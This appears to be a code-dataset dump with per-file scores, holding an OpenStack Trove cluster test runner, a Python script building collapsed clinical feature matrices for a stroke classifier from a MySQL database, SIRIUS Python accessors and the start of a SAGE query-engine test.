for instance in cluster.instances]
def _assert_cluster_action(
self, cluster_id, expected_task_name, expected_http_code,
check_locality=True):
if expected_http_code is not None:
self.assert_client_code(expected_http_code)
if expected_task_name:
self._assert_cluster_response(cluster_id, expected_task_name,
check_locality=check_locality)
def _assert_cluster_states(self, cluster_id, expected_states,
fast_fail_status=None):
for status in expected_states:
start_time = timer.time()
try:
poll_until(lambda: self._has_task(
cluster_id, status, fast_fail_status=fast_fail_status),
sleep_time=self.def_sleep_time,
time_out=self.def_timeout)
self.report.log("Cluster has gone '%s' in %s." %
(status, self._time_since(start_time)))
except exception.PollTimeOut:
self.report.log(
"Status of cluster '%s' did not change to '%s' after %s."
% (cluster_id, status, self._time_since(start_time)))
return False
return True
def _has_task(self, cluster_id, task, fast_fail_status=None):
cluster = self.auth_client.clusters.get(cluster_id)
task_name = cluster.task['name']
self.report.log("Waiting for cluster '%s' to become '%s': %s"
% (cluster_id, task, task_name))
if fast_fail_status and task_name == fast_fail_status:
raise RuntimeError("Cluster '%s' acquired a fast-fail task: %s"
% (cluster_id, task))
return task_name == task
def _assert_cluster_response(self, cluster_id, expected_task_name,
expected_http_code=200, check_locality=True):
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_client_code(expected_http_code)
self._assert_cluster_values(cluster, expected_task_name,
check_locality=check_locality)
def _assert_cluster_values(self, cluster, expected_task_name,
check_locality=True):
with TypeCheck('Cluster', cluster) as check:
check.has_field("id", six.string_types)
check.has_field("name", six.string_types)
check.has_field("datastore", dict)
check.has_field("instances", list)
check.has_field("links", list)
for instance in cluster.instances:
isinstance(instance, dict)
self.assert_is_not_none(instance['id'])
self.assert_is_not_none(instance['links'])
self.assert_is_not_none(instance['name'])
self.assert_equal(expected_task_name, cluster.task['name'],
'Unexpected cluster task name')
if check_locality:
self.assert_equal(self.locality, cluster.locality,
"Unexpected cluster locality")
def _assert_cluster_gone(self, cluster_id):
t0 = timer.time()
try:
# This will poll until the cluster goes away.
self._assert_cluster_states(cluster_id, ['NONE'])
self.fail(
"Cluster '%s' still existed after %s seconds."
% (cluster_id, self._time_since(t0)))
except exceptions.NotFound:
self.assert_client_code(404)
class CassandraClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class Cassandra_22ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class Cassandra_3ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class MariadbClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class PxcClusterActionsRunner(ClusterActionsRunner):
def run_cluster_create(self, num_nodes=3, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
super(PxcClusterActionsRunner, self).run_cluster_create(
num_nodes=num_nodes, expected_task_name=expected_task_name,
expected_instance_states=expected_instance_states,
expected_http_code=expected_http_code)
def run_cluster_shrink(self):
raise SkipTest("Operation not supported by the datastore.")
def run_cluster_grow(self):
raise SkipTest("Operation not supported by the datastore.")
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
class VerticaClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('cluster_member_count')
class RedisClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class MongodbClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
@property
def min_cluster_node_count(self):
return 3
class CouchbaseClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.") | trove/tests/scenario/runners/cluster_actions_runners.py |
import os
from proboscis import SkipTest
import six
import time as timer
from trove.common import cfg
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
CONF = cfg.CONF
class ClusterActionsRunner(TestRunner):
USE_CLUSTER_ID_FLAG = 'TESTS_USE_CLUSTER_ID'
DO_NOT_DELETE_CLUSTER_FLAG = 'TESTS_DO_NOT_DELETE_CLUSTER'
EXTRA_INSTANCE_NAME = "named_instance"
def __init__(self):
super(ClusterActionsRunner, self).__init__()
self.cluster_name = 'test_cluster'
self.cluster_id = 0
self.cluster_inst_ids = None
self.cluster_count_before_create = None
self.srv_grp_id = None
self.current_root_creds = None
self.locality = 'affinity'
@property
def is_using_existing_cluster(self):
return self.has_env_flag(self.USE_CLUSTER_ID_FLAG)
@property
def has_do_not_delete_cluster(self):
return self.has_env_flag(self.DO_NOT_DELETE_CLUSTER_FLAG)
@property
def min_cluster_node_count(self):
return 2
def run_cluster_create(self, num_nodes=None, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
self.cluster_count_before_create = len(
self.auth_client.clusters.list())
if not num_nodes:
num_nodes = self.min_cluster_node_count
instance_flavor = self.get_instance_flavor()
instances_def = [
self.build_flavor(
flavor_id=self.get_flavor_href(instance_flavor),
volume_size=self.instance_info.volume['size'])] * num_nodes
self.cluster_id = self.assert_cluster_create(
self.cluster_name, instances_def, self.locality,
expected_task_name, expected_instance_states, expected_http_code)
def assert_cluster_create(
self, cluster_name, instances_def, locality, expected_task_name,
expected_instance_states, expected_http_code):
self.report.log("Testing cluster create: %s" % cluster_name)
cluster = self.get_existing_cluster()
if cluster:
self.report.log("Using an existing cluster: %s" % cluster.id)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states[-1:])
else:
cluster = self.auth_client.clusters.create(
cluster_name, self.instance_info.dbaas_datastore,
self.instance_info.dbaas_datastore_version,
instances=instances_def, locality=locality)
self._assert_cluster_values(cluster, expected_task_name)
# Don't give an expected task here or it will do a 'get' on
# the cluster. We tested the cluster values above.
self._assert_cluster_action(cluster.id, None,
expected_http_code)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states)
# Create the helper user/database on the first node.
# The cluster should handle the replication itself.
self.create_test_helper_on_instance(cluster_instances[0])
# make sure the server_group was created
self.cluster_inst_ids = [inst.id for inst in cluster_instances]
for id in self.cluster_inst_ids:
srv_grp_id = self.assert_server_group_exists(id)
if self.srv_grp_id and self.srv_grp_id != srv_grp_id:
self.fail("Found multiple server groups for cluster")
self.srv_grp_id = srv_grp_id
cluster_id = cluster.id
# Although all instances have already acquired the expected state,
# we still need to poll for the final cluster task, because
# it may take up to the periodic task interval until the task name
# gets updated in the Trove database.
self._assert_cluster_states(cluster_id, ['NONE'])
return cluster_id
def get_existing_cluster(self):
if self.is_using_existing_cluster:
cluster_id = os.environ.get(self.USE_CLUSTER_ID_FLAG)
return self.auth_client.clusters.get(cluster_id)
def run_cluster_list(self, expected_http_code=200):
self.assert_cluster_list(
self.cluster_count_before_create + 1,
expected_http_code)
def assert_cluster_list(self, expected_count,
expected_http_code):
count = len(self.auth_client.clusters.list())
self.assert_client_code(expected_http_code)
self.assert_equal(expected_count, count, "Unexpected cluster count")
def run_cluster_show(self, expected_http_code=200,
expected_task_name='NONE'):
self.assert_cluster_show(
self.cluster_id, expected_task_name, expected_http_code)
def assert_cluster_show(self, cluster_id, expected_task_name,
expected_http_code):
self._assert_cluster_response(cluster_id, expected_task_name)
def run_cluster_root_enable(self, expected_task_name=None,
expected_http_code=200):
root_credentials = self.test_helper.get_helper_credentials_root()
self.current_root_creds = self.auth_client.root.create_cluster_root(
self.cluster_id, root_credentials['password'])
self.assert_equal(root_credentials['name'],
self.current_root_creds[0])
self.assert_equal(root_credentials['password'],
self.current_root_creds[1])
self._assert_cluster_action(self.cluster_id, expected_task_name,
expected_http_code)
def run_verify_cluster_root_enable(self):
if not self.current_root_creds:
raise SkipTest("Root not enabled.")
cluster = self.auth_client.clusters.get(self.cluster_id)
for instance in cluster.instances:
root_enabled_test = self.auth_client.root.is_instance_root_enabled(
instance['id'])
self.assert_true(root_enabled_test.rootEnabled)
ping_response = self.test_helper.ping(
cluster.ip[0],
username=self.current_root_creds[0],
password=<PASSWORD>[1]
)
self.assert_true(ping_response)
def run_add_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_add_cluster_data(data_type, self.cluster_id)
def run_add_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_add_cluster_data(data_type, self.cluster_id)
def assert_add_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.add_data(data_type, cluster.ip[0])
def run_verify_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def run_verify_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def assert_verify_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.verify_data(data_type, cluster.ip[0])
def run_remove_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def run_remove_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def assert_remove_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.remove_data(data_type, cluster.ip[0])
def run_cluster_grow(self, expected_task_name='GROWING_CLUSTER',
expected_http_code=202):
# Add two instances. One with an explicit name.
added_instance_defs = [
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size']),
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size'],
self.EXTRA_INSTANCE_NAME)]
self.assert_cluster_grow(
self.cluster_id, added_instance_defs, expected_task_name,
expected_http_code)
def _build_instance_def(self, flavor_id, volume_size, name=None):
instance_def = self.build_flavor(
flavor_id=flavor_id, volume_size=volume_size)
if name:
instance_def.update({'name': name})
return instance_def
def assert_cluster_grow(self, cluster_id, added_instance_defs,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
cluster = self.auth_client.clusters.grow(cluster_id,
added_instance_defs)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_equal(len(added_instance_defs),
len(cluster.instances) - initial_instance_count,
"Unexpected number of added nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_states(cluster_id, ['NONE'])
self._assert_cluster_response(cluster_id, 'NONE')
def run_cluster_shrink(
self, expected_task_name=None, expected_http_code=202):
self.assert_cluster_shrink(self.cluster_id, [self.EXTRA_INSTANCE_NAME],
expected_task_name, expected_http_code)
def assert_cluster_shrink(self, cluster_id, removed_instance_names,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
removed_instances = self._find_cluster_instances_by_name(
cluster, removed_instance_names)
cluster = self.auth_client.clusters.shrink(
cluster_id, [{'id': instance['id']}
for instance in removed_instances])
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self._assert_cluster_states(cluster_id, ['NONE'])
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_equal(
len(removed_instance_names),
initial_instance_count - len(cluster.instances),
"Unexpected number of removed nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_response(cluster_id, 'NONE')
def _find_cluster_instances_by_name(self, cluster, instance_names):
return [instance for instance in cluster.instances
if instance['name'] in instance_names]
def run_cluster_delete(
self, expected_task_name='DELETING',
expected_last_instance_state='SHUTDOWN', expected_http_code=202):
if self.has_do_not_delete_cluster:
self.report.log("TESTS_DO_NOT_DELETE_CLUSTER=True was "
"specified, skipping delete...")
raise SkipTest("TESTS_DO_NOT_DELETE_CLUSTER was specified.")
self.assert_cluster_delete(
self.cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code)
def assert_cluster_delete(
self, cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code):
self.report.log("Testing cluster delete: %s" % cluster_id)
cluster_instances = self._get_cluster_instances(cluster_id)
self.auth_client.clusters.delete(cluster_id)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_all_gone(cluster_instances, expected_last_instance_state)
self._assert_cluster_gone(cluster_id)
# make sure the server group is gone too
self.assert_server_group_gone(self.srv_grp_id)
def _get_cluster_instances(self, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
return [self.auth_client.instances.get(instance['id'])
for instance in cluster.instances]
def _assert_cluster_action(
self, cluster_id, expected_task_name, expected_http_code,
check_locality=True):
if expected_http_code is not None:
self.assert_client_code(expected_http_code)
if expected_task_name:
self._assert_cluster_response(cluster_id, expected_task_name,
check_locality=check_locality)
def _assert_cluster_states(self, cluster_id, expected_states,
fast_fail_status=None):
for status in expected_states:
start_time = timer.time()
try:
poll_until(lambda: self._has_task(
cluster_id, status, fast_fail_status=fast_fail_status),
sleep_time=self.def_sleep_time,
time_out=self.def_timeout)
self.report.log("Cluster has gone '%s' in %s." %
(status, self._time_since(start_time)))
except exception.PollTimeOut:
self.report.log(
"Status of cluster '%s' did not change to '%s' after %s."
% (cluster_id, status, self._time_since(start_time)))
return False
return True
def _has_task(self, cluster_id, task, fast_fail_status=None):
cluster = self.auth_client.clusters.get(cluster_id)
task_name = cluster.task['name']
self.report.log("Waiting for cluster '%s' to become '%s': %s"
% (cluster_id, task, task_name))
if fast_fail_status and task_name == fast_fail_status:
raise RuntimeError("Cluster '%s' acquired a fast-fail task: %s"
% (cluster_id, task))
return task_name == task
def _assert_cluster_response(self, cluster_id, expected_task_name,
expected_http_code=200, check_locality=True):
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_client_code(expected_http_code)
self._assert_cluster_values(cluster, expected_task_name,
check_locality=check_locality)
def _assert_cluster_values(self, cluster, expected_task_name,
check_locality=True):
with TypeCheck('Cluster', cluster) as check:
check.has_field("id", six.string_types)
check.has_field("name", six.string_types)
check.has_field("datastore", dict)
check.has_field("instances", list)
check.has_field("links", list)
for instance in cluster.instances:
isinstance(instance, dict)
self.assert_is_not_none(instance['id'])
self.assert_is_not_none(instance['links'])
self.assert_is_not_none(instance['name'])
self.assert_equal(expected_task_name, cluster.task['name'],
'Unexpected cluster task name')
if check_locality:
self.assert_equal(self.locality, cluster.locality,
"Unexpected cluster locality")
def _assert_cluster_gone(self, cluster_id):
t0 = timer.time()
try:
# This will poll until the cluster goes away.
self._assert_cluster_states(cluster_id, ['NONE'])
self.fail(
"Cluster '%s' still existed after %s seconds."
% (cluster_id, self._time_since(t0)))
except exceptions.NotFound:
self.assert_client_code(404)
class CassandraClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class Cassandra_22ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class Cassandra_3ClusterActionsRunner(CassandraClusterActionsRunner):
pass
class MariadbClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class PxcClusterActionsRunner(ClusterActionsRunner):
def run_cluster_create(self, num_nodes=3, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
super(PxcClusterActionsRunner, self).run_cluster_create(
num_nodes=num_nodes, expected_task_name=expected_task_name,
expected_instance_states=expected_instance_states,
expected_http_code=expected_http_code)
def run_cluster_shrink(self):
raise SkipTest("Operation not supported by the datastore.")
def run_cluster_grow(self):
raise SkipTest("Operation not supported by the datastore.")
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('min_cluster_member_count')
class VerticaClusterActionsRunner(ClusterActionsRunner):
@property
def min_cluster_node_count(self):
return self.get_datastore_config_property('cluster_member_count')
class RedisClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
class MongodbClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.")
@property
def min_cluster_node_count(self):
return 3
class CouchbaseClusterActionsRunner(ClusterActionsRunner):
def run_cluster_root_enable(self):
raise SkipTest("Operation is currently not supported.") | 0.541894 | 0.340787 |
import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') | src/train_collapse_stroke_classifier_both.py | import numpy as np
import os
import csv
import sys
import MySQLdb
import scipy.stats as stats
from collections import defaultdict
import scipy as sp
from scipy import stats
from sklearn.externals import joblib
from sklearn import metrics
from sklearn import ensemble
from sklearn import linear_model
from sklearn import model_selection
from sklearn import preprocessing
from sklearn import svm
from scipy.sparse import csr_matrix
import pickle
import time
import datetime
from datetime import date
e2e={}
case=sys.argv[1]
control=sys.argv[2]
model=sys.argv[3]
print "new loop start", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
def credential():
'''import login and passwrd from credential text file'''
reader=csv.reader(open({credentials filename}),delimiter = ",")
for login, password in reader:
login=login
passwd=password
return login, passwd
login,passwd=credential()
print "first entrance to mysql", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S')
db = MySQLdb.connect(host={host}, user ='%s' % (login), passwd='%s' % (passwd), db={database}, port={poat})
c = db.cursor()
cid2icd=dict()
cond_file={condition events filename}+case+control+'.npy'
cond_events=np.load(cond_file)
cond_events=cond_events.tolist()
#gather ICD9 or ICD10 codes of conditions
SQL='''select condition_source_value icd, condition_source_concept_id cid from {condition occurrence table} where condition_source_concept_id in %s''' %str(tuple(cond_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
#snomed concept id,
for cond in cond_events:
if cond in cid2icd.keys():
cond=cid2icd[cond]
ocond=cond
if cond[0:3]=='I9:':
print cond
cond=cond.split(':')[1]
elif cond[0:4]=='I10:':
cond=cond.split(':')[1]
e2e[cond]=ocond
proc_file={procedure events filename}+case+control+'.npy'
proc_events=np.load(proc_file)
proc_events=proc_events.tolist()
#Gather ICD9 or ICD10 codes of procedures
SQL='''select procedure_source_value icd, procedure_source_concept_id cid from {procedure occurrence table} where procedure_source_concept_id in %s''' %str(tuple(proc_events))
c.execute(SQL)
results = c.fetchall()
for icd,cid in results:
cid2icd[cid]=icd
for proc in proc_events:
if proc in cid2icd.keys():
proc=cid2icd[proc]
oproc=proc
if proc[0:3]=='I9:':
proc=proc.split(':')[1]
elif proc[0:4]=='I10:':
proc=proc.split(':')[1]
elif proc[0:3]=='C4:':
proc=proc.split(':')[1]
e2e[proc]=oproc
e2e_file={events2uniformevents filename}+case+control+'.npy'
np.save(e2e_file,e2e)
drug_file={drug era events filename}+case+control+'.npy'
drug_events=np.load(drug_file)
drug_events=drug_events.tolist()
e2i_file={events2cols filename}+case+control+'.npy'
e2i=np.load(e2i_file)
e2i=e2i[()]
matrix_file={training_set matrix filename} + case + control + '.npz'
matrix=sp.sparse.load_npz(matrix_file).toarray()
#load dictionary of feature collapsing models based on CCS+ATC combination
dictfile=model+'2code.npy'
ccs2code=np.load(dictfile)
ccs2code=ccs2code[()]
if model=='cat':
model2='chem_substrs'
if model=='lvl1_':
model2='anatoms'
if model=='lvl2_':
model2='pharm_subgrps'
drugdictfile=model2+'2code.npy'
drug2code=np.load(drugdictfile)
drug2code=drug2code[()]
demo_file={demographics filename}+case+control+'.npy'
demo_events=np.load(demo_file)
demo_events=demo_events.tolist()
#matrix of collapsed features
model_mat=np.zeros(shape=(matrix.shape[0],len(ccs2code.keys())+len(drug2code.keys())+len(demo_events))).astype('int8')
keys=ccs2code.keys()
for i in range(0,len(keys)):
events=ccs2code[keys[i]]
for e in events:
if e in e2e.keys():
if e2e[e] in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e2e[e]])]
dkeys=drug2code.keys()
for i in range(len(keys),len(keys)+len(dkeys)):
events=drug2code[dkeys[i-len(keys)]]
for e in events:
if e in drug_events:
if e in e2i.keys():
model_mat[:,i]=model_mat[:,i] | matrix[:,int(e2i[e])]
#add demo events
for i in range(len(keys)+len(dkeys),len(keys)+len(dkeys)+len(demo_events)):
events=demo_events
for e in events:
if e in e2i.keys():
model_mat[:,i]=matrix[:,int(e2i[e])]
C_val = 1
examples=csr_matrix(model_mat)
mat_file={insert matrix filename}+model+model2+case+control+'.npz'
sp.sparse.save_npz(mat_file,examples)
print "end", datetime.datetime.fromtimestamp(time.time()).strftime('%Y-%m-%d %H:%M:%S') | 0.069101 | 0.136983 |
from .helpers import *
from .coefficient_array import CoefficientArray, PwCoeffs
from .py_sirius import *
from .py_sirius import K_point_set, Density
from .logger import Logger
from .operators import S_operator
import numpy as np
from numpy import array, zeros
__all__ = ["ot", "baarman", "bands", "edft"]
class OccupancyDescriptor(object):
"""
Accessor for occupation numbers
"""
def __set__(self, instance, value):
for key, v in value._data.items():
k, ispn = key
# append with zeros if necessary
nb = instance.ctx().num_bands()
f = zeros(nb)
ll = list(array(v).flatten())
f[:len(ll)] = ll
instance[k].set_band_occupancy(ispn, f)
instance.sync_band_occupancies()
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_occupancy(ispn))
return out
class PWDescriptor(object):
"""
Accessor for wave-function coefficients
"""
def __set__(self, instance, value):
from .helpers import store_pw_coeffs
store_pw_coeffs(instance, value)
def __get__(self, instance, owner):
return PwCoeffs(instance)
class KPointWeightDescriptor(object):
"""
Accessor for k-point weights
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].weight())
return out
class BandEnergiesDescriptor(object):
"""
Accessor for band energies
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_energies(ispn))
return out
def __set__(self, instance, value):
for key, val in value._data.items():
k, ispn = key
for j, v in enumerate(val):
instance[k].set_band_energy(j, ispn, v)
instance.sync_band_energies()
class DensityDescriptor(object):
def __init__(self, i):
self.i = i
def __get__(self, instance, owner):
return np.array(instance.f_pw_local(self.i))
def __set__(self, instance, value):
instance.f_pw_local(self.i)[:] = value
K_point_set.fn = OccupancyDescriptor()
K_point_set.C = PWDescriptor()
K_point_set.w = KPointWeightDescriptor()
K_point_set.e = BandEnergiesDescriptor()
Density.rho = DensityDescriptor(0)
Density.mx = DensityDescriptor(1)
Density.my = DensityDescriptor(2)
Density.mz = DensityDescriptor(3) | python_module/sirius/__init__.py | from .helpers import *
from .coefficient_array import CoefficientArray, PwCoeffs
from .py_sirius import *
from .py_sirius import K_point_set, Density
from .logger import Logger
from .operators import S_operator
import numpy as np
from numpy import array, zeros
__all__ = ["ot", "baarman", "bands", "edft"]
class OccupancyDescriptor(object):
"""
Accessor for occupation numbers
"""
def __set__(self, instance, value):
for key, v in value._data.items():
k, ispn = key
# append with zeros if necessary
nb = instance.ctx().num_bands()
f = zeros(nb)
ll = list(array(v).flatten())
f[:len(ll)] = ll
instance[k].set_band_occupancy(ispn, f)
instance.sync_band_occupancies()
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_occupancy(ispn))
return out
class PWDescriptor(object):
"""
Accessor for wave-function coefficients
"""
def __set__(self, instance, value):
from .helpers import store_pw_coeffs
store_pw_coeffs(instance, value)
def __get__(self, instance, owner):
return PwCoeffs(instance)
class KPointWeightDescriptor(object):
"""
Accessor for k-point weights
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].weight())
return out
class BandEnergiesDescriptor(object):
"""
Accessor for band energies
"""
def __get__(self, instance, owner):
out = CoefficientArray(dtype=np.double, ctype=np.array)
for k in range(len(instance)):
for ispn in range(instance.ctx().num_spins()):
key = k, ispn
out[key] = np.array(instance[k].band_energies(ispn))
return out
def __set__(self, instance, value):
for key, val in value._data.items():
k, ispn = key
for j, v in enumerate(val):
instance[k].set_band_energy(j, ispn, v)
instance.sync_band_energies()
class DensityDescriptor(object):
def __init__(self, i):
self.i = i
def __get__(self, instance, owner):
return np.array(instance.f_pw_local(self.i))
def __set__(self, instance, value):
instance.f_pw_local(self.i)[:] = value
K_point_set.fn = OccupancyDescriptor()
K_point_set.C = PWDescriptor()
K_point_set.w = KPointWeightDescriptor()
K_point_set.e = BandEnergiesDescriptor()
Density.rho = DensityDescriptor(0)
Density.mx = DensityDescriptor(1)
Density.my = DensityDescriptor(2)
Density.mz = DensityDescriptor(3) | 0.558086 | 0.159872 |
from query_engine.sage_engine import SageEngine
from query_engine.iterators.scan import ScanIterator
from query_engine.iterators.filter import FilterIterator
from query_engine.iterators.projection import ProjectionIterator
from query_engine.iterators.loader import load
from database.hdt_file_connector import HDTFileConnector
from tests.utils import DummyDataset
import math
hdtDoc = HDTFileConnector('tests/data/watdiv.10M.hdt')
engine = SageEngine()
triple = {
'subject': 'http://db.uwaterloo.ca/~galuc/wsdbm/Offer1000',
'predicate': '?p',
